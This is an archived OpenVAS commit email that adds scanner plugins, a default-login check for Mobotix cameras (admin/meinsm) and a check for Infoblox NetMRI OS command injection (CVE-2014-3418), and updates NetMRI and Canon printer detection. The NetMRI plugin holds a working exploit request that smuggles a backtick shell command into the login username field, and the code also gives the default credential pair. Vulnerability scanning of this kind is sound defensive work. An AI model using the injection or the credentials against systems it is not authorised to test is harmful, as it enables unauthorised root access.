[Openvas-nvts-commits] r566 - / scripts scripts/2012 scripts/2014 scripts/pre2008

scm-commit at wald.intevation.org scm-commit at wald.intevation.org
Tue Jul 15 16:09:14 CEST 2014


Author: mime
Date: 2014-07-15 16:09:14 +0200 (Tue, 15 Jul 2014)
New Revision: 566

Added:
   scripts/2014/gb_mobotix_cameras_default_credentials.nasl
   scripts/2014/gb_netmri_os_cmd_injec_07_14.nasl
Modified:
   ChangeLog
   scripts/2012/gb_netmri_detect.nasl
   scripts/gb_canon_printers_detect.nasl
   scripts/pre2008/dont_scan_printers.nasl
Log:
Added new plugins. Updated to detect more versions. Update for Canon detection.

Modified: ChangeLog
===================================================================
--- ChangeLog	2014-07-15 09:26:23 UTC (rev 565)
+++ ChangeLog	2014-07-15 14:09:14 UTC (rev 566)
@@ -1,3 +1,16 @@
+2014-07-15 Michael Meyer <michael.meyer at greenbone.net>
+
+	* scripts/2014/gb_mobotix_cameras_default_credentials.nasl,
+	scripts/2014/gb_netmri_os_cmd_injec_07_14.nasl:
+	Added new plugins.
+
+	* scripts/2012/gb_netmri_detect.nasl:
+	Updated to detect more versions.
+
+	* scripts/gb_canon_printers_detect.nasl
+	scripts/pre2008/dont_scan_printers.nasl:
+	Update for Canon detection.
+
 2014-07-15 Antu Sanadi <santu at secpod.com>
 
 	* scripts/2014/deb_2978.nasl,

Modified: scripts/2012/gb_netmri_detect.nasl
===================================================================
--- scripts/2012/gb_netmri_detect.nasl	2014-07-15 09:26:23 UTC (rev 565)
+++ scripts/2012/gb_netmri_detect.nasl	2014-07-15 14:09:14 UTC (rev 566)
@@ -92,7 +92,8 @@
 
 c = 0;
 
-if("<title>NetMRI Login" >< data) {
+if("<title>NetMRI Login" >< data || "<title>Network Automation Login" >< data)
+{
 
   lines = split(data);
 
@@ -100,6 +101,7 @@
 
     c++;
 
+    vers = 'unknown';
     if("Version:" >< line) {
 
        version = eregmatch(pattern:"<td>([^<]+)</td>", string:lines[c]); 
@@ -107,21 +109,21 @@
 
        vers = version[1];
 
-       set_kb_item(name: string("www/", port, "/netmri"), value: string(vers," under /"));
-       set_kb_item(name:"netMRI/installed", value:TRUE);
+    }    
 
-       cpe = build_cpe(value:vers, exp:"^([0-9.]+)", base:"cpe:/a:infoblox:netmri:");
-       if(isnull(cpe))
-         cpe = 'cpe:/a:infoblox:netmri';
+    set_kb_item(name: string("www/", port, "/netmri"), value: string(vers," under /"));
+    set_kb_item(name:"netMRI/installed", value:TRUE);
 
-       register_product(cpe:cpe, location:install, nvt:SCRIPT_OID, port:port);
+    cpe = build_cpe(value:vers, exp:"^([0-9.]+)", base:"cpe:/a:infoblox:netmri:");
+    if(isnull(cpe))
+      cpe = 'cpe:/a:infoblox:netmri';
 
-       log_message(data: build_detection_report(app:"NetMRI", version:vers, install:"/", cpe:cpe, concluded: version[0]),
-                   port:port);
+    register_product(cpe:cpe, location:install, nvt:SCRIPT_OID, port:port);
 
-       exit(0);
+    log_message(data: build_detection_report(app:"NetMRI", version:vers, install:"/", cpe:cpe, concluded: version[0]),
+                port:port);
 
-    }  
+    exit(0);
   }  
 }  
 

Added: scripts/2014/gb_mobotix_cameras_default_credentials.nasl
===================================================================
--- scripts/2014/gb_mobotix_cameras_default_credentials.nasl	                        (rev 0)
+++ scripts/2014/gb_mobotix_cameras_default_credentials.nasl	2014-07-15 14:09:14 UTC (rev 566)
@@ -0,0 +1,112 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Mobotix Cameras Default Admin Credentials
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2014 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License
+# as published by the Free Software Foundation; either version 2
+# of the License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+include("revisions-lib.inc");
+
+tag_summary = 'The remote Mobotix camera web interface is prone to a default
+account authentication bypass vulnerability.';
+
+tag_impact = 'This issue may be exploited by a remote attacker to gain
+access to sensitive information or modify system configuration.';
+
+tag_insight = 'It was possible to login with default credentials admin/meinsm.';
+tag_vuldetect = 'Try to login with default credentials.';
+tag_solution = 'Change the password.';
+
+ desc = "
+Summary:
+" + tag_summary + "
+
+Vulnerability Detection:
+" + tag_vuldetect + "
+
+Vulnerability Insight:
+" + tag_insight + "
+
+Impact:
+" + tag_impact + "
+
+Solution:
+" + tag_solution;
+
+if (description)
+{
+ script_oid("1.3.6.1.4.1.25623.1.0.105060"); 
+ script_version("$Revision$");
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
+ script_tag(name:"risk_factor", value:"High");
+ script_name("Mobotix Cameras Default Admin Credentials");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2014-07-15 10:02:06 +0200 (Thu, 15 Jul 2014)");
+ script_description(desc);
+ script_summary("Determine if it is possible to login with default credentials.");
+ script_category(ACT_ATTACK);
+ script_family("Default Accounts");
+ script_copyright("This script is Copyright (C) 2014 Greenbone Networks GmbH");
+ script_dependencies("find_service.nasl", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+
+ if (revcomp(a: OPENVAS_VERSION, b: "6.0+beta5") >= 0) {
+   script_tag(name : "summary" , value : tag_summary);
+   script_tag(name : "impact" , value : tag_impact);
+   script_tag(name : "vuldetect" , value : tag_vuldetect);
+   script_tag(name : "insight" , value : tag_insight);
+   script_tag(name : "solution" , value : tag_solution);
+ }
+
+ exit(0);
+}
+
+include("http_func.inc");
+include("misc_func.inc");
+
+port = get_http_port( default:80 );
+if( ! get_port_state( port ) ) exit( 0 );
+
+host = get_host_name();
+url = '/admin/index.html';
+
+req = 'GET ' + url + ' HTTP/1.1\r\n' + 
+      'Host: ' + host + '\r\n';
+
+buf = http_send_recv( port:port, data:req + '\r\n', bodyonly:FALSE );
+if( "401 Unauthorized" >!< buf || "MOBOTIX Camera User" >!< buf ) exit( 0 );
+
+userpass64 = base64( str:'admin:meinsm' );
+
+req += 'Authorization: Basic ' + userpass64 + '\r\n\r\n';
+buf = http_send_recv( port:port, data:req, bodyonly:FALSE );
+
+if( buf =~ "HTTP/1\.. 200" && "/admin/access" >< buf )
+{
+  report = 'It was possible to login with username "admin" and password "meinsm"\n';
+  security_message( port:port, data:report);
+} 
+
+exit( 99 );
+


Property changes on: scripts/2014/gb_mobotix_cameras_default_credentials.nasl
___________________________________________________________________
Added: svn:keywords
   + Id Revision Date

Added: scripts/2014/gb_netmri_os_cmd_injec_07_14.nasl
===================================================================
--- scripts/2014/gb_netmri_os_cmd_injec_07_14.nasl	                        (rev 0)
+++ scripts/2014/gb_netmri_os_cmd_injec_07_14.nasl	2014-07-15 14:09:14 UTC (rev 566)
@@ -0,0 +1,167 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Infoblox NetMRI OS Command Injection Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2014 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License
+# as published by the Free Software Foundation; either version 2
+# of the License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+include("revisions-lib.inc");
+
+CPE = "cpe:/a:infoblox:netmri";
+
+tag_impact = "An attacker may leverage these issues to execute arbitrary code as root";
+
+tag_affected = "Infoblox NetMRI versions 6.4.X.X-6.8.4.X are vulnerable;a
+other versions may also be affected.";
+
+tag_summary = "Infoblox NetMRI is prone to a OS Command Injection Vulnerability";
+tag_solution = "Update to Infoblox NetMRI >= 6.8.5";
+tag_vuldetect = "Send a special crafted HTTP POST request and check the response";
+
+if (description)
+{
+ script_oid("1.3.6.1.4.1.25623.1.0.105061");
+ script_cve_id("CVE-2014-3418");
+ script_tag(name:"cvss_base", value:"10.0");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
+ script_version ("$Revision$");
+
+ script_name("Infoblox NetMRI OS Command Injection Vulnerability");
+
+ desc = "
+Summary:
+" + tag_summary + "
+
+Vulnerability Detection:
+" + tag_vuldetect + "
+
+Impact:
+" + tag_impact + "
+
+Affected Software/OS:
+" + tag_affected + "
+
+Solution:
+" + tag_solution;
+
+ script_xref(name:"URL", value:"http://packetstormsecurity.com/files/127409/Infoblox-6.8.4.x-OS-Command-Injection.html");
+ script_xref(name:"URL", value:"http://www.infoblox.com/");
+ 
+ script_tag(name:"risk_factor", value:"Critical");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2014-07-15 14:33:34 +0200 (Tue, 15 Jul 2014)");
+ script_description(desc);
+ script_summary("Determine if it is possible to execute a command");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2014 Greenbone Networks GmbH");
+ script_dependencies("gb_netmri_detect.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ script_require_keys("netMRI/installed");
+
+ if (revcomp(a: OPENVAS_VERSION, b: "6.0+beta5") >= 0) {
+    script_tag(name : "impact" , value : tag_impact);
+    script_tag(name : "vuldetect" , value : tag_vuldetect);
+    script_tag(name : "solution" , value : tag_solution);
+    script_tag(name : "summary" , value : tag_summary);
+    script_tag(name : "affected" , value : tag_affected);
+  }
+
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+
+if( ! port = get_app_port( cpe:CPE ) ) exit( 0 );
+host = get_host_name();
+
+check = 'openvas_' + rand();
+bound = rand();
+
+payload = 'echo ' + check  + ' > /var/home/tools/skipjack/app/webui/OpenVAS_RCE_Check.txt';
+
+data = '-----------------------------' + bound  + '\r\n' +
+      'Content-Disposition: form-data; name="_formStack"\r\n' +
+      '\r\n' +
+      'netmri/config/userAdmin/login\r\n' +
+      '-----------------------------' + bound + '\r\n' +
+      'Content-Disposition: form-data; name="mode"\r\n' +
+      '\r\n'  +
+      'DO-LOGIN\r\n' +
+      '-----------------------------' + bound + '\r\n' +
+      'Content-Disposition: form-data; name="eulaAccepted"\r\n' +
+      '\r\n' +
+      'Decline\r\n' +
+      '-----------------------------' + bound + '\r\n' +
+      'Content-Disposition: form-data; name="TrustToken"\r\n' +
+      '\r\n' +
+      '\r\n' +
+      '-----------------------------' + bound + '\r\n' +
+      'Content-Disposition: form-data; name="skipjackUsername"\r\n' +
+      '\r\n' +
+      'admin`' + payload + '`\r\n' +
+      '-----------------------------' + bound + '\r\n' +
+      'Content-Disposition: form-data; name="skipjackPassword"\r\n' +
+      '\r\n' +
+      'admin\r\n' +
+      '-----------------------------' + bound + '\r\n' +
+      'Content-Disposition: form-data; name="weakPassword"\r\n' +
+      '\r\n' +
+      'true\r\n' +
+      '-----------------------------' + bound + '\r\n' +
+      'Content-Disposition: form-data; name="x"\r\n' +
+      '\r\n' +
+      '0\r\n' +
+      '-----------------------------' + bound + '\r\n' +
+      'Content-Disposition: form-data; name="y"\r\n' +
+      '\r\n' +
+      '0\r\n' +
+      '-----------------------------' + bound + '--';
+
+len = strlen( data );
+
+req = 'POST /netmri/config/userAdmin/login.tdf HTTP/1.1\r\n' + 
+      'Host: ' + host + '\r\n' + 
+      'User-Agent: ' + OPENVAS_HTTP_USER_AGENT + '\r\n' + 
+      'Content-Type: multipart/form-data; boundary=---------------------------' + bound + '\r\n' + 
+      'Content-Length: ' + len + '\r\n' + 
+      '\r\n' + data;
+
+result = http_send_recv( port:port, data:req, bodyonly:FALSE );
+
+if( ! result || result !~ "HTTP/1.. 200" ) exit( 0 );
+
+url = '/webui/OpenVAS_RCE_Check.txt';
+req1 = http_get( item:url, port:port );
+buf = http_send_recv( port:port, data:req1, bodyonly:FALSE );
+
+if( check >< buf )
+{
+  security_message( port:port, expert_info: 'Request:\n' + req + '\nResponse:\n' + result );
+  exit( 0 );
+}
+        
+exit( 99 );
+


Property changes on: scripts/2014/gb_netmri_os_cmd_injec_07_14.nasl
___________________________________________________________________
Added: svn:keywords
   + Id Revision Date

Modified: scripts/gb_canon_printers_detect.nasl
===================================================================
--- scripts/gb_canon_printers_detect.nasl	2014-07-15 09:26:23 UTC (rev 565)
+++ scripts/gb_canon_printers_detect.nasl	2014-07-15 14:09:14 UTC (rev 566)
@@ -83,12 +83,19 @@
 buf = http_send_recv(port:port, data:req, bodyonly:FALSE);
 
 ## Confirm the application
-if('>Canon' >< buf && ">Copyright CANON INC" ><  buf && "Printer" >< buf)
+if(('>Canon' >< buf && ">Copyright CANON INC" ><  buf && "Printer" >< buf) || "CANON HTTP Server" >< buf)
 {
    set_kb_item(name:"target_is_printer", value:1);
    set_kb_item(name:"canon_printer/installed", value:1);
    set_kb_item(name:"canon_printer/port", value: port);
 
+   pref = get_kb_item("global_settings/exclude_printers");
+   if( pref  == "yes" )
+   {
+       set_kb_item(name: "Host/dead", value: TRUE);
+       log_message( port:port, data:'The remote host is a printer. The scan has been disabled against this host.\nIf you want to scan the remote host, uncheck the "Exclude printers from scan" option and re-scan it.');
+   }
+
    ## Get the model name
    printer_model = eregmatch(pattern:">(Canon.[A-Z0-9]+).[A-Za-z]+<", string: buf);
    if(printer_model[1])
@@ -113,13 +120,6 @@
                  " printer device.\nCPE: " + cpe + "\nConcluded: " +
                  printer_model[1], port:port);
 
-     pref = get_kb_item("global_settings/exclude_printers");
-     if( pref  == "yes" )
-     {
-         set_kb_item(name: "Host/dead", value: TRUE);
-         log_message( port:port, data:'The remote host is a printer. The scan has been disabled against this host.\nIf you want to scan the remote host, uncheck the "Exclude printers from scan" option and re-scan it.');
-     }
-
       exit(0);
 
   }

Modified: scripts/pre2008/dont_scan_printers.nasl
===================================================================
--- scripts/pre2008/dont_scan_printers.nasl	2014-07-15 09:26:23 UTC (rev 565)
+++ scripts/pre2008/dont_scan_printers.nasl	2014-07-15 14:09:14 UTC (rev 566)
@@ -171,7 +171,7 @@
 
 
 # Patch by Laurent Facq
-ports = make_list(80, 280, 631, 443);
+ports = make_list(80, 8000, 280, 631, 443);
 foreach port (ports)
 {
  if(get_port_state(port))
@@ -215,7 +215,7 @@
       exit(0);
     }
 
-    else if ('>Canon' >< buf && ">Copyright CANON INC" ><  buf && "Printer" >< buf)
+    else if (('>Canon' >< banner && ">Copyright CANON INC" ><  banner && "Printer" >< banner) || "CANON HTTP Server" >< banner)
     {
        set_kb_item(name: "Host/dead", value: TRUE);
        if (debug_level) display(get_host_ip(), " runs a Canon web server\n");



More information about the Openvas-nvts-commits mailing list